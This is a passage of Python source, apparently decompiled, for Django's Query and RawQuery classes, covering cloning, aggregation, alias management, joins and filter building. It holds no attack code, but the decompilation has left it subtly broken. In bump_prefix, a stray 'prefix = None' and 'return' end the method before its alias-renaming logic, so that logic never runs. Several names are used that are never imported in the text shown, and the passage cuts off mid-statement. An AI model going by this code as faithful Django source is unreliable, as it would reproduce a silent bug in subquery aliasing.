product\nfrom string import ascii_uppercase\nfrom django.core.exceptions import FieldDoesNotExist, FieldError\nfrom django.db import DEFAULT_DB_ALIAS, connections\nfrom django.db.models.aggregates import Count\nfrom django.db.models.constants import LOOKUP_SEP\nfrom django.db.models.expressions import Col, Ref\nfrom django.db.models.fields.related_lookups import MultiColSource\nfrom django.db.models.lookups import Lookup\nfrom django.db.models.query_utils import Q, check_rel_lookup_compatibility, refs_expression\nfrom django.db.models.sql.constants import INNER, LOUTER, ORDER_DIR, ORDER_PATTERN, QUERY_TERMS, SINGLE\nfrom django.db.models.sql.datastructures import BaseTable, Empty, EmptyResultSet, Join, MultiJoin\nfrom django.db.models.sql.where import AND, OR, ExtraWhere, NothingNode, WhereNode\nfrom django.utils import six\nfrom django.utils.deprecation import RemovedInDjango20Warning\nfrom django.utils.encoding import force_text\nfrom django.utils.tree import Node\n__all__ = [\n 'Query', 'RawQuery']\n\ndef get_field_names_from_opts(opts):\n return set(chain.from_iterable(((f.name, f.attname) if f.concrete else (f.name,)) for f in opts.get_fields()))\n\n\nclass RawQuery(object):\n \"\"\"\n A single raw SQL query\n \"\"\"\n\n def __init__(self, sql, using, params=None, context=None):\n self.params = params or ()\n self.sql = sql\n self.using = using\n self.cursor = None\n self.low_mark, self.high_mark = (0, None)\n self.extra_select = {}\n self.annotation_select = {}\n self.context = context or {}\n return\n\n def clone(self, using):\n return RawQuery(self.sql, using, params=self.params, context=self.context.copy())\n\n def get_columns(self):\n if self.cursor is None:\n self._execute_query()\n converter = connections[self.using].introspection.column_name_converter\n return [ converter(column_meta[0]) for column_meta in self.cursor.description\n ]\n\n def __iter__(self):\n self._execute_query()\n if not connections[self.using].features.can_use_chunked_reads:\n result = list(self.cursor)\n else:\n result = self.cursor\n return iter(result)\n\n def __repr__(self):\n return '<%s: %s>' % (self.__class__.__name__, self)\n\n @property\n def params_type(self):\n if isinstance(self.params, Mapping):\n return dict\n return tuple\n\n def __str__(self):\n return self.sql % self.params_type(self.params)\n\n def _execute_query(self):\n connection = connections[self.using]\n params_type = self.params_type\n adapter = connection.ops.adapt_unknown_value\n if params_type is tuple:\n params = tuple(adapter(val) for val in self.params)\n elif params_type is dict:\n params = dict((key, adapter(val)) for key, val in six.iteritems(self.params))\n else:\n raise RuntimeError('Unexpected params type: %s' % params_type)\n self.cursor = connection.cursor()\n self.cursor.execute(self.sql, params)\n\n\nclass Query(object):\n \"\"\"\n A single SQL query.\n \"\"\"\n alias_prefix = 'T'\n subq_aliases = frozenset([alias_prefix])\n query_terms = QUERY_TERMS\n compiler = 'SQLCompiler'\n\n def __init__(self, model, where=WhereNode):\n self.model = model\n self.alias_refcount = {}\n self.alias_map = OrderedDict()\n self.external_aliases = set()\n self.table_map = {}\n self.default_cols = True\n self.default_ordering = True\n self.standard_ordering = True\n self.used_aliases = set()\n self.filter_is_sticky = False\n self.subquery = False\n self.select = []\n self.tables = []\n self.where = where()\n self.where_class = where\n self.group_by = None\n self.order_by = []\n self.low_mark, self.high_mark = (0, None)\n self.distinct = False\n self.distinct_fields = []\n self.select_for_update = False\n self.select_for_update_nowait = False\n self.select_for_update_skip_locked = False\n self.select_related = False\n self.max_depth = 5\n self.values_select = []\n self._annotations = None\n self.annotation_select_mask = None\n self._annotation_select_cache = None\n self.combinator = None\n self.combinator_all = False\n self.combined_queries = ()\n self._extra = None\n self.extra_select_mask = None\n self._extra_select_cache = None\n self.extra_tables = ()\n self.extra_order_by = ()\n self.deferred_loading = (\n set(), True)\n self.context = {}\n return\n\n @property\n def extra(self):\n if self._extra is None:\n self._extra = OrderedDict()\n return self._extra\n\n @property\n def annotations(self):\n if self._annotations is None:\n self._annotations = OrderedDict()\n return self._annotations\n\n def __str__(self):\n \"\"\"\n Returns the query as a string of SQL with the parameter values\n substituted in (use sql_with_params() to see the unsubstituted string).\n\n Parameter values won't necessarily be quoted correctly, since that is\n done by the database interface at execution time.\n \"\"\"\n sql, params = self.sql_with_params()\n return sql % params\n\n def sql_with_params(self):\n \"\"\"\n Returns the query as an SQL string and the parameters that will be\n substituted into the query.\n \"\"\"\n return self.get_compiler(DEFAULT_DB_ALIAS).as_sql()\n\n def __deepcopy__(self, memo):\n result = self.clone(memo=memo)\n memo[id(self)] = result\n return result\n\n def _prepare(self, field):\n return self\n\n def get_compiler(self, using=None, connection=None):\n if using is None and connection is None:\n raise ValueError('Need either using or connection')\n if using:\n connection = connections[using]\n return connection.ops.compiler(self.compiler)(self, connection, using)\n\n def get_meta(self):\n \"\"\"\n Returns the Options instance (the model._meta) from which to start\n processing. Normally, this is self.model._meta, but it can be changed\n by subclasses.\n \"\"\"\n return self.model._meta\n\n def clone(self, klass=None, memo=None, **kwargs):\n \"\"\"\n Creates a copy of the current instance. The 'kwargs' parameter can be\n used by clients to update attributes after copying has taken place.\n \"\"\"\n obj = Empty()\n obj.__class__ = klass or self.__class__\n obj.model = self.model\n obj.alias_refcount = self.alias_refcount.copy()\n obj.alias_map = self.alias_map.copy()\n obj.external_aliases = self.external_aliases.copy()\n obj.table_map = self.table_map.copy()\n obj.default_cols = self.default_cols\n obj.default_ordering = self.default_ordering\n obj.standard_ordering = self.standard_ordering\n obj.select = self.select[:]\n obj.tables = self.tables[:]\n obj.where = self.where.clone()\n obj.where_class = self.where_class\n if self.group_by is None:\n obj.group_by = None\n elif self.group_by is True:\n obj.group_by = True\n else:\n obj.group_by = self.group_by[:]\n obj.order_by = self.order_by[:]\n obj.low_mark, obj.high_mark = self.low_mark, self.high_mark\n obj.distinct = self.distinct\n obj.distinct_fields = self.distinct_fields[:]\n obj.select_for_update = self.select_for_update\n obj.select_for_update_nowait = self.select_for_update_nowait\n obj.select_for_update_skip_locked = self.select_for_update_skip_locked\n obj.select_related = self.select_related\n obj.values_select = self.values_select[:]\n obj._annotations = self._annotations.copy() if self._annotations is not None else None\n if self.annotation_select_mask is None:\n obj.annotation_select_mask = None\n else:\n obj.annotation_select_mask = self.annotation_select_mask.copy()\n obj._annotation_select_cache = None\n obj.max_depth = self.max_depth\n obj.combinator = self.combinator\n obj.combinator_all = self.combinator_all\n obj.combined_queries = self.combined_queries\n obj._extra = self._extra.copy() if self._extra is not None else None\n if self.extra_select_mask is None:\n obj.extra_select_mask = None\n else:\n obj.extra_select_mask = self.extra_select_mask.copy()\n if self._extra_select_cache is None:\n obj._extra_select_cache = None\n else:\n obj._extra_select_cache = self._extra_select_cache.copy()\n obj.extra_tables = self.extra_tables\n obj.extra_order_by = self.extra_order_by\n obj.deferred_loading = (copy.copy(self.deferred_loading[0]), self.deferred_loading[1])\n if self.filter_is_sticky and self.used_aliases:\n obj.used_aliases = self.used_aliases.copy()\n else:\n obj.used_aliases = set()\n obj.filter_is_sticky = False\n obj.subquery = self.subquery\n if 'alias_prefix' in self.__dict__:\n obj.alias_prefix = self.alias_prefix\n if 'subq_aliases' in self.__dict__:\n obj.subq_aliases = self.subq_aliases.copy()\n obj.__dict__.update(kwargs)\n if hasattr(obj, '_setup_query'):\n obj._setup_query()\n obj.context = self.context.copy()\n obj._forced_pk = getattr(self, '_forced_pk', False)\n return obj\n\n def add_context(self, key, value):\n self.context[key] = value\n\n def get_context(self, key, default=None):\n return self.context.get(key, default)\n\n def relabeled_clone(self, change_map):\n clone = self.clone()\n clone.change_aliases(change_map)\n return clone\n\n def rewrite_cols(self, annotation, col_cnt):\n orig_exprs = annotation.get_source_expressions()\n new_exprs = []\n for expr in orig_exprs:\n if isinstance(expr, Ref):\n new_exprs.append(expr)\n elif isinstance(expr, (WhereNode, Lookup)):\n new_expr, col_cnt = self.rewrite_cols(expr, col_cnt)\n new_exprs.append(new_expr)\n elif isinstance(expr, Col) or expr.contains_aggregate and not expr.is_summary:\n col_cnt += 1\n col_alias = '__col%d' % col_cnt\n self.annotations[col_alias] = expr\n self.append_annotation_mask([col_alias])\n new_exprs.append(Ref(col_alias, expr))\n else:\n new_expr, col_cnt = self.rewrite_cols(expr, col_cnt)\n new_exprs.append(new_expr)\n\n annotation.set_source_expressions(new_exprs)\n return (annotation, col_cnt)\n\n def get_aggregation(self, using, added_aggregate_names):\n \"\"\"\n Returns the dictionary with the values of the existing aggregations.\n \"\"\"\n if not self.annotation_select:\n return {}\n else:\n has_limit = self.low_mark != 0 or self.high_mark is not None\n has_existing_annotations = any(annotation for alias, annotation in self.annotations.items() if alias not in added_aggregate_names)\n if isinstance(self.group_by, list) or has_limit or has_existing_annotations or self.distinct or self.combinator:\n from django.db.models.sql.subqueries import AggregateQuery\n outer_query = AggregateQuery(self.model)\n inner_query = self.clone()\n inner_query.select_for_update = False\n inner_query.select_related = False\n if not has_limit and not self.distinct_fields:\n inner_query.clear_ordering(True)\n if not inner_query.distinct:\n if inner_query.default_cols and has_existing_annotations:\n inner_query.group_by = [\n self.model._meta.pk.get_col(inner_query.get_initial_alias())]\n inner_query.default_cols = False\n relabels = {t:'subquery' for t in inner_query.tables}\n relabels[None] = 'subquery'\n col_cnt = 0\n for alias, expression in list(inner_query.annotation_select.items()):\n if expression.is_summary:\n expression, col_cnt = inner_query.rewrite_cols(expression, col_cnt)\n outer_query.annotations[alias] = expression.relabeled_clone(relabels)\n del inner_query.annotations[alias]\n inner_query.set_annotation_mask(inner_query.annotation_select_mask)\n\n if inner_query.select == [] and not inner_query.default_cols and not inner_query.annotation_select_mask:\n inner_query.select = [\n self.model._meta.pk.get_col(inner_query.get_initial_alias())]\n try:\n outer_query.add_subquery(inner_query, using)\n except EmptyResultSet:\n return {alias:None for alias in outer_query.annotation_select}\n\n else:\n outer_query = self\n self.select = []\n self.default_cols = False\n self._extra = {}\n outer_query.clear_ordering(True)\n outer_query.clear_limits()\n outer_query.select_for_update = False\n outer_query.select_related = False\n compiler = outer_query.get_compiler(using)\n result = compiler.execute_sql(SINGLE)\n if result is None:\n result = [ None for q in outer_query.annotation_select.items() ]\n converters = compiler.get_converters(outer_query.annotation_select.values())\n result = compiler.apply_converters(result, converters)\n return {alias:val for (alias, annotation), val in zip(outer_query.annotation_select.items(), result)}\n\n def get_count(self, using):\n \"\"\"\n Performs a COUNT() query using the current filter constraints.\n \"\"\"\n obj = self.clone()\n obj.add_annotation(Count('*'), alias='__count', is_summary=True)\n number = obj.get_aggregation(using, ['__count'])['__count']\n if number is None:\n number = 0\n return number\n\n def has_filters(self):\n return self.where\n\n def has_results(self, using):\n q = self.clone()\n if not q.distinct:\n if q.group_by is True:\n q.add_fields((f.attname for f in self.model._meta.concrete_fields), False)\n q.set_group_by()\n q.clear_select_clause()\n q.clear_ordering(True)\n q.set_limits(high=1)\n compiler = q.get_compiler(using=using)\n return compiler.has_results()\n\n def combine(self, rhs, connector):\n \"\"\"\n Merge the 'rhs' query into the current one (with any 'rhs' effects\n being applied *after* (that is, \"to the right of\") anything in the\n current query. 'rhs' is not modified during a call to this function.\n\n The 'connector' parameter describes how to connect filters from the\n 'rhs' query.\n \"\"\"\n if not self.model == rhs.model:\n raise AssertionError('Cannot combine queries on two different base models.')\n assert self.can_filter(), 'Cannot combine queries once a slice has been taken.'\n assert self.distinct == rhs.distinct, 'Cannot combine a unique query with a non-unique query.'\n assert self.distinct_fields == rhs.distinct_fields, 'Cannot combine queries with different distinct fields.'\n change_map = {}\n conjunction = connector == AND\n reuse = set() if conjunction else set(self.tables)\n self.get_initial_alias()\n joinpromoter = JoinPromoter(connector, 2, False)\n joinpromoter.add_votes(j for j in self.alias_map if self.alias_map[j].join_type == INNER)\n rhs_votes = set()\n for alias in rhs.tables[1:]:\n join = rhs.alias_map[alias]\n join = join.relabeled_clone(change_map)\n new_alias = self.join(join, reuse=reuse)\n if join.join_type == INNER:\n rhs_votes.add(new_alias)\n reuse.discard(new_alias)\n if alias != new_alias:\n change_map[alias] = new_alias\n if not rhs.alias_refcount[alias]:\n self.unref_alias(new_alias)\n\n joinpromoter.add_votes(rhs_votes)\n joinpromoter.update_join_types(self)\n w = rhs.where.clone()\n w.relabel_aliases(change_map)\n self.where.add(w, connector)\n self.select = []\n for col in rhs.select:\n self.add_select(col.relabeled_clone(change_map))\n\n if connector == OR and self._extra and rhs._extra:\n raise ValueError(\"When merging querysets using 'or', you cannot have extra(select=...) on both sides.\")\n self.extra.update(rhs.extra)\n extra_select_mask = set()\n if self.extra_select_mask is not None:\n extra_select_mask.update(self.extra_select_mask)\n if rhs.extra_select_mask is not None:\n extra_select_mask.update(rhs.extra_select_mask)\n if extra_select_mask:\n self.set_extra_mask(extra_select_mask)\n self.extra_tables += rhs.extra_tables\n self.order_by = rhs.order_by[:] if rhs.order_by else self.order_by\n self.extra_order_by = rhs.extra_order_by or self.extra_order_by\n return\n\n def deferred_to_data(self, target, callback):\n \"\"\"\n Converts the self.deferred_loading data structure to an alternate data\n structure, describing the field that *will* be loaded. This is used to\n compute the columns to select from the database and also by the\n QuerySet class to work out which fields are being initialized on each\n model. Models that have all their fields included aren't mentioned in\n the result, only those that have field restrictions in place.\n\n The \"target\" parameter is the instance that is populated (in place).\n The \"callback\" is a function that is called whenever a (model, field)\n pair need to be added to \"target\". It accepts three parameters:\n \"target\", and the model and list of fields being added for that model.\n \"\"\"\n field_names, defer = self.deferred_loading\n if not field_names:\n return\n orig_opts = self.get_meta()\n seen = {}\n must_include = {orig_opts.concrete_model: {orig_opts.pk}}\n for field_name in field_names:\n parts = field_name.split(LOOKUP_SEP)\n cur_model = self.model._meta.concrete_model\n opts = orig_opts\n for name in parts[:-1]:\n old_model = cur_model\n source = opts.get_field(name)\n if is_reverse_o2o(source):\n cur_model = source.related_model\n else:\n cur_model = source.remote_field.model\n opts = cur_model._meta\n if not is_reverse_o2o(source):\n must_include[old_model].add(source)\n add_to_dict(must_include, cur_model, opts.pk)\n\n field = opts.get_field(parts[(-1)])\n is_reverse_object = field.auto_created and not field.concrete\n model = field.related_model if is_reverse_object else field.model\n model = model._meta.concrete_model\n if model == opts.model:\n model = cur_model\n if not is_reverse_o2o(field):\n add_to_dict(seen, model, field)\n\n if defer:\n workset = {}\n for model, values in six.iteritems(seen):\n for field in model._meta.fields:\n if field in values:\n continue\n m = field.model._meta.concrete_model\n add_to_dict(workset, m, field)\n\n for model, values in six.iteritems(must_include):\n if model in workset:\n workset[model].update(values)\n\n for model, values in six.iteritems(workset):\n callback(target, model, values)\n\n else:\n for model, values in six.iteritems(must_include):\n if model in seen:\n seen[model].update(values)\n else:\n seen[model] = values\n\n for model in orig_opts.get_parent_list():\n if model not in seen:\n seen[model] = set()\n\n for model, values in six.iteritems(seen):\n callback(target, model, values)\n\n def table_alias(self, table_name, create=False):\n \"\"\"\n Returns a table alias for the given table_name and whether this is a\n new alias or not.\n\n If 'create' is true, a new alias is always created. Otherwise, the\n most recently created alias for the table (if one exists) is reused.\n \"\"\"\n alias_list = self.table_map.get(table_name)\n if not create and alias_list:\n alias = alias_list[0]\n self.alias_refcount[alias] += 1\n return (\n alias, False)\n if alias_list:\n alias = '%s%d' % (self.alias_prefix, len(self.alias_map) + 1)\n alias_list.append(alias)\n else:\n alias = table_name\n self.table_map[alias] = [alias]\n self.alias_refcount[alias] = 1\n self.tables.append(alias)\n return (alias, True)\n\n def ref_alias(self, alias):\n \"\"\" Increases the reference count for this alias. \"\"\"\n self.alias_refcount[alias] += 1\n\n def unref_alias(self, alias, amount=1):\n \"\"\" Decreases the reference count for this alias. \"\"\"\n self.alias_refcount[alias] -= amount\n\n def promote_joins(self, aliases):\n \"\"\"\n Promotes recursively the join type of given aliases and its children to\n an outer join. If 'unconditional' is False, the join is only promoted if\n it is nullable or the parent join is an outer join.\n\n The children promotion is done to avoid join chains that contain a LOUTER\n b INNER c. So, if we have currently a INNER b INNER c and a->b is promoted,\n then we must also promote b->c automatically, or otherwise the promotion\n of a->b doesn't actually change anything in the query results.\n \"\"\"\n aliases = list(aliases)\n while aliases:\n alias = aliases.pop(0)\n if self.alias_map[alias].join_type is None:\n continue\n assert self.alias_map[alias].join_type is not None\n parent_alias = self.alias_map[alias].parent_alias\n parent_louter = parent_alias and self.alias_map[parent_alias].join_type == LOUTER\n already_louter = self.alias_map[alias].join_type == LOUTER\n if (self.alias_map[alias].nullable or parent_louter) and not already_louter:\n self.alias_map[alias] = self.alias_map[alias].promote()\n aliases.extend(join for join in self.alias_map.keys() if self.alias_map[join].parent_alias == alias and join not in aliases)\n\n return\n\n def demote_joins(self, aliases):\n \"\"\"\n Change join type from LOUTER to INNER for all joins in aliases.\n\n Similarly to promote_joins(), this method must ensure no join chains\n containing first an outer, then an inner join are generated. If we\n are demoting b->c join in chain a LOUTER b LOUTER c then we must\n demote a->b automatically, or otherwise the demotion of b->c doesn't\n actually change anything in the query results. .\n \"\"\"\n aliases = list(aliases)\n while aliases:\n alias = aliases.pop(0)\n if self.alias_map[alias].join_type == LOUTER:\n self.alias_map[alias] = self.alias_map[alias].demote()\n parent_alias = self.alias_map[alias].parent_alias\n if self.alias_map[parent_alias].join_type == INNER:\n aliases.append(parent_alias)\n\n def reset_refcounts(self, to_counts):\n \"\"\"\n This method will reset reference counts for aliases so that they match\n the value passed in :param to_counts:.\n \"\"\"\n for alias, cur_refcount in self.alias_refcount.copy().items():\n unref_amount = cur_refcount - to_counts.get(alias, 0)\n self.unref_alias(alias, unref_amount)\n\n def change_aliases(self, change_map):\n \"\"\"\n Changes the aliases in change_map (which maps old-alias -> new-alias),\n relabelling any references to them in select columns and the where\n clause.\n \"\"\"\n assert set(change_map.keys()).intersection(set(change_map.values())) == set()\n self.where.relabel_aliases(change_map)\n if isinstance(self.group_by, list):\n self.group_by = [ col.relabeled_clone(change_map) for col in self.group_by ]\n self.select = [ col.relabeled_clone(change_map) for col in self.select ]\n if self._annotations:\n self._annotations = OrderedDict((key, col.relabeled_clone(change_map)) for key, col in self._annotations.items())\n for old_alias, new_alias in six.iteritems(change_map):\n if old_alias not in self.alias_map:\n continue\n alias_data = self.alias_map[old_alias].relabeled_clone(change_map)\n self.alias_map[new_alias] = alias_data\n self.alias_refcount[new_alias] = self.alias_refcount[old_alias]\n del self.alias_refcount[old_alias]\n del self.alias_map[old_alias]\n table_aliases = self.table_map[alias_data.table_name]\n for pos, alias in enumerate(table_aliases):\n if alias == old_alias:\n table_aliases[pos] = new_alias\n break\n\n self.external_aliases = {change_map.get(alias, alias) for alias in self.external_aliases}\n\n def bump_prefix(self, outer_query):\n \"\"\"\n Changes the alias prefix to the next letter in the alphabet in a way\n that the outer query's aliases and this query's aliases will not\n conflict. Even tables that previously had no alias will get an alias\n after this call.\n \"\"\"\n\n def prefix_gen():\n \"\"\"\n Generates a sequence of characters in alphabetical order:\n -> 'A', 'B', 'C', ...\n\n When the alphabet is finished, the sequence will continue with the\n Cartesian product:\n -> 'AA', 'AB', 'AC', ...\n \"\"\"\n alphabet = ascii_uppercase\n prefix = chr(ord(self.alias_prefix) + 1)\n yield prefix\n for n in count(1):\n seq = alphabet[alphabet.index(prefix):] if prefix else alphabet\n for s in product(seq, repeat=n):\n yield ('').join(s)\n\n prefix = None\n\n return\n\n if self.alias_prefix != outer_query.alias_prefix:\n return\n local_recursion_limit = 127\n for pos, prefix in enumerate(prefix_gen()):\n if prefix not in self.subq_aliases:\n self.alias_prefix = prefix\n break\n if pos > local_recursion_limit:\n raise RuntimeError('Maximum recursion depth exceeded: too many subqueries.')\n\n self.subq_aliases = self.subq_aliases.union([self.alias_prefix])\n outer_query.subq_aliases = outer_query.subq_aliases.union(self.subq_aliases)\n change_map = OrderedDict()\n for pos, alias in enumerate(self.tables):\n new_alias = '%s%d' % (self.alias_prefix, pos)\n change_map[alias] = new_alias\n self.tables[pos] = new_alias\n\n self.change_aliases(change_map)\n\n def get_initial_alias(self):\n \"\"\"\n Returns the first alias for this query, after increasing its reference\n count.\n \"\"\"\n if self.tables:\n alias = self.tables[0]\n self.ref_alias(alias)\n else:\n alias = self.join(BaseTable(self.get_meta().db_table, None))\n return alias\n\n def count_active_tables(self):\n \"\"\"\n Returns the number of tables in this query with a non-zero reference\n count. Note that after execution, the reference counts are zeroed, so\n tables added in compiler will not be seen by this method.\n \"\"\"\n return len([ 1 for count in self.alias_refcount.values() if count ])\n\n def join(self, join, reuse=None):\n \"\"\"\n Return an alias for the 'join', either reusing an existing alias for\n that join or creating a new one. 'join' is either a\n sql.datastructures.BaseTable or Join.\n\n The 'reuse' parameter can be either None which means all joins are\n reusable, or it can be a set containing the aliases that can be reused.\n\n A join is always created as LOUTER if the lhs alias is LOUTER to make\n sure chains like t1 LOUTER t2 INNER t3 aren't generated. All new\n joins are created as LOUTER if the join is nullable.\n \"\"\"\n reuse = [ a for a, j in self.alias_map.items() if (reuse is None or a in reuse) and j == join\n ]\n if reuse:\n self.ref_alias(reuse[0])\n return reuse[0]\n else:\n alias, _ = self.table_alias(join.table_name, create=True)\n if join.join_type:\n if self.alias_map[join.parent_alias].join_type == LOUTER or join.nullable:\n join_type = LOUTER\n else:\n join_type = INNER\n join.join_type = join_type\n join.table_alias = alias\n self.alias_map[alias] = join\n return alias\n\n def join_parent_model(self, opts, model, alias, seen):\n \"\"\"\n Makes sure the given 'model' is joined in the query. If 'model' isn't\n a parent of 'opts' or if it is None this method is a no-op.\n\n The 'alias' is the root alias for starting the join, 'seen' is a dict\n of model -> alias of existing joins. It must also contain a mapping\n of None -> some alias. This will be returned in the no-op case.\n \"\"\"\n if model in seen:\n return seen[model]\n else:\n chain = opts.get_base_chain(model)\n if not chain:\n return alias\n curr_opts = opts\n for int_model in chain:\n if int_model in seen:\n curr_opts = int_model._meta\n alias = seen[int_model]\n continue\n if not curr_opts.parents[int_model]:\n curr_opts = int_model._meta\n continue\n link_field = curr_opts.get_ancestor_link(int_model)\n _, _, _, joins, _ = self.setup_joins([\n link_field.name], curr_opts, alias)\n curr_opts = int_model._meta\n alias = seen[int_model] = joins[(-1)]\n\n return alias or seen[None]\n\n def add_annotation(self, annotation, alias, is_summary=False):\n \"\"\"\n Adds a single annotation expression to the Query\n \"\"\"\n annotation = annotation.resolve_expression(self, allow_joins=True, reuse=None, summarize=is_summary)\n self.append_annotation_mask([alias])\n self.annotations[alias] = annotation\n return\n\n def _prepare_as_filter_value(self):\n return self.clone()\n\n def prepare_lookup_value(self, value, lookups, can_reuse, allow_joins=True):\n used_joins = []\n if len(lookups) == 0:\n lookups = [\n 'exact']\n if value is None:\n if lookups[(-1)] not in ('exact', 'iexact'):\n raise ValueError('Cannot use None as a query value')\n return (True, ['isnull'], used_joins)\n else:\n if hasattr(value, 'resolve_expression'):\n pre_joins = self.alias_refcount.copy()\n value = value.resolve_expression(self, reuse=can_reuse, allow_joins=allow_joins)\n used_joins = [ k for k, v in self.alias_refcount.items() if v > pre_joins.get(k, 0) ]\n elif isinstance(value, (list, tuple)):\n processed_values = []\n used_joins = set()\n for sub_value in value:\n if hasattr(sub_value, 'resolve_expression'):\n pre_joins = self.alias_refcount.copy()\n processed_values.append(sub_value.resolve_expression(self, reuse=can_reuse, allow_joins=allow_joins))\n used_joins |= set(k for k, v in self.alias_refcount.items() if v > pre_joins.get(k, 0))\n\n if hasattr(value, '_prepare_as_filter_value'):\n value = value._prepare_as_filter_value()\n value.bump_prefix(self)\n if connections[DEFAULT_DB_ALIAS].features.interprets_empty_strings_as_nulls and lookups[(-1)] == 'exact' and value == '':\n value = True\n lookups[-1] = 'isnull'\n return (\n value, lookups, used_joins)\n\n def solve_lookup_type(self, lookup):\n \"\"\"\n Solve the lookup type from the lookup (eg: 'foobar__id__icontains')\n \"\"\"\n lookup_splitted = lookup.split(LOOKUP_SEP)\n if self._annotations:\n expression, expression_lookups = refs_expression(lookup_splitted, self.annotations)\n if expression:\n return (expression_lookups, (), expression)\n _, field, _, lookup_parts = self.names_to_path(lookup_splitted, self.get_meta())\n field_parts = lookup_splitted[0:len(lookup_splitted) - len(lookup_parts)]\n if len(lookup_parts) == 0:\n lookup_parts = [\n 'exact']\n elif len(lookup_parts) > 1:\n if not field_parts:\n raise FieldError('Invalid lookup \"%s\" for model %s\".' % (\n lookup, self.get_meta().model.__name__))\n return (\n lookup_parts, field_parts, False)\n\n def check_query_object_type(self, value, opts, field):\n \"\"\"\n Checks whether the object passed while querying is of the correct type.\n If not, it raises a ValueError specifying the wrong object.\n \"\"\"\n if hasattr(value, '_meta'):\n if not check_rel_lookup_compatibility(value._meta.model, opts, field):\n raise ValueError('Cannot query \"%s\": Must be \"%s\" instance.' % (\n value, opts.object_name))\n\n def check_related_objects(self, field, value, opts):\n \"\"\"\n Checks the type of object passed to query relations.\n \"\"\"\n if field.is_relation:\n if getattr(value, '_forced_pk', False) and not check_rel_lookup_compatibility(value.model, opts, field):\n raise ValueError('Cannot use QuerySet for \"%s\": Use a QuerySet for \"%s\".' % (\n value.model._meta.object_name, opts.object_name))\n elif hasattr(value, '_meta'):\n self.check_query_object_type(value, opts, field)\n elif hasattr(value, '__iter__'):\n for v in value:\n self.check_query_object_type(v, opts, field)\n\n def build_lookup(self, lookups, lhs, rhs):\n \"\"\"\n Tries to extract transforms and lookup from given lhs.\n\n The lhs value is something that works like SQLExpression.\n The rhs value is what the lookup is going to compare against.\n The lookups is a list of names to extract using get_lookup()\n and get_transform().\n \"\"\"\n lookups = lookups[:]\n while lookups:\n name = lookups[0]\n if len(lookups) == 1:\n final_lookup = lhs.get_lookup(name)\n if not final_lookup:\n lhs = self.try_transform(lhs, name, lookups)\n final_lookup = lhs.get_lookup('exact')\n return final_lookup(lhs, rhs)\n lhs = self.try_transform(lhs, name, lookups)\n lookups = lookups[1:]\n\n def try_transform(self, lhs, name, rest_of_lookups):\n \"\"\"\n Helper method for build_lookup. Tries to fetch and initialize\n a transform for name parameter from lhs.\n \"\"\"\n transform_class = lhs.get_transform(name)\n if transform_class:\n return transform_class(lhs)\n raise FieldError(\"Unsupported lookup '%s' for %s or join on the field not permitted.\" % (\n name, lhs.output_field.__class__.__name__))\n\n def build_filter(self, filter_expr, branch_negated=False, current_negated=False, can_reuse=None, connector=AND, allow_joins=True, split_subq=True):\n \"\"\"\n Builds a WhereNode for a single filter clause, but doesn't add it\n to this Query. Query.add_q() will then add this filter to the where\n Node.\n\n The 'branch_negated' tells us if the current branch contains any\n negations. This will be used to determine if subqueries are needed.\n\n The 'current_negated' is used to determine if the current filter is\n negated or not and this will be used to determine if IS NULL filtering\n is needed.\n\n The difference between current_netageted and branch_negated is that\n branch_negated is set on first negation, but current_negated is\n flipped for each negation.\n\n Note that add_filter will not do any negating itself, that is done\n upper in the code by add_q().\n\n The 'can_reuse' is a set of reusable joins for multijoins.\n\n The method will create a filter clause that can be added to the current\n query. However, if the filter isn't added to the query then the caller\n is responsible for unreffing the joins used.\n \"\"\"\n if isinstance(filter_expr, dict):\n raise FieldError('Cannot parse keyword query as dict')\n arg, value = filter_expr\n if not arg:\n raise FieldError('Cannot parse keyword query %r' % arg)\n lookups, parts, reffed_expression = self.solve_lookup_type(arg)\n if not allow_joins and len(parts) > 1:\n raise FieldError('Joined field references are not permitted in this query')\n value, lookups, used_joins = self.prepare_lookup_value(value, lookups, can_reuse, allow_joins)\n clause = self.where_class()\n if reffed_expression:\n condition = self.build_lookup(lookups, reffed_expression, value)\n clause.add(condition, AND)\n return (\n clause, [])\n else:\n opts = self.get_meta()\n alias = self.get_initial_alias()\n allow_many = not branch_negated or not split_subq\n try:\n field, sources, opts, join_list, path = self.setup_joins(parts, opts, alias, can_reuse=can_reuse, allow_many=allow_many)\n if isinstance(value, Iterator):\n value = list(value)\n self.check_related_objects(field, value, opts)\n self._lookup_joins = join_list\n except MultiJoin as e:\n return self.split_exclude(filter_expr, LOOKUP_SEP.join(parts[:e.level]), can_reuse, e.names_with_path)\n\n if can_reuse is not None:\n can_reuse.update(join_list)\n used_joins = set(used_joins).union(set(join_list))\n targets, alias, join_list = self.trim_joins(sources, join_list, path)\n if field.is_relation:\n num_lookups = len(lookups)\n if num_lookups > 1:\n raise FieldError(('Related Field got invalid lookup: {}').format(lookups[0]))\n assert num_lookups > 0\n lookup_class = field.get_lookup(lookups[0])\n if lookup_class is None:\n raise FieldError(('Related Field got invalid lookup: {}').format(lookups[0]))\n if len(targets) == 1:\n lhs = targets[0].get_col(alias, field)\n else:\n lhs = MultiColSource(alias, targets, sources, field)\n condition = lookup_class(lhs, value)\n lookup_type = lookup_class.lookup_name\n else:\n col = targets[0].get_col(alias, field)\n condition = self.build_lookup(lookups, col, value)\n lookup_type = condition.lookup_name\n clause.add(condition, AND)\n require_outer = lookup_type == 'isnull' and value is True and not current_negated\n if current_negated and (lookup_type != 'isnull' or value is False):\n require_outer = True\n if lookup_type != 'isnull' and (self.is_nullable(targets[0]) or self.alias_map[join_list[(-1)]].join_type == LOUTER):\n lookup_class = targets[0].get_lookup('isnull')\n clause.add(lookup_class(targets[0].get_col(alias, sources[0]), False), AND)\n return (\n clause, used_joins if not require_outer else ())\n\n def add_filter(self, filter_clause):\n self.add_q(Q(**{filter_clause[0]: filter_clause[1]}))\n\n def add_q(self, q_object):\n \"\"\"\n A preprocessor for the internal _add_q(). Responsible for doing final\n join promotion.\n \"\"\"\n existing_inner = set(a for a in self.alias_map if self.alias_map[a].join_type == INNER)\n clause, _ = self._add_q(q_object, self.used_aliases)\n if clause:\n self.where.add(clause, AND)\n self.demote_joins(existing_inner)\n\n def _add_q(self, q_object, used_aliases, branch_negated=False, current_negated=False, allow_joins=True, split_subq=True):\n \"\"\"\n Adds a Q-object to the current filter.\n \"\"\"\n connector = q_object.connector\n current_negated = current_negated ^ q_object.negated\n branch_negated = branch_negated or q_object.negated\n target_clause = self.where_class(connector=connector, negated=q_object.negated)\n joinpromoter = JoinPromoter(q_object.connector, len(q_object.children), current_negated)\n for child in q_object.children:\n if isinstance(child, Node):\n child_clause, needed_inner = self._add_q(child, used_aliases, branch_negated, current_negated, 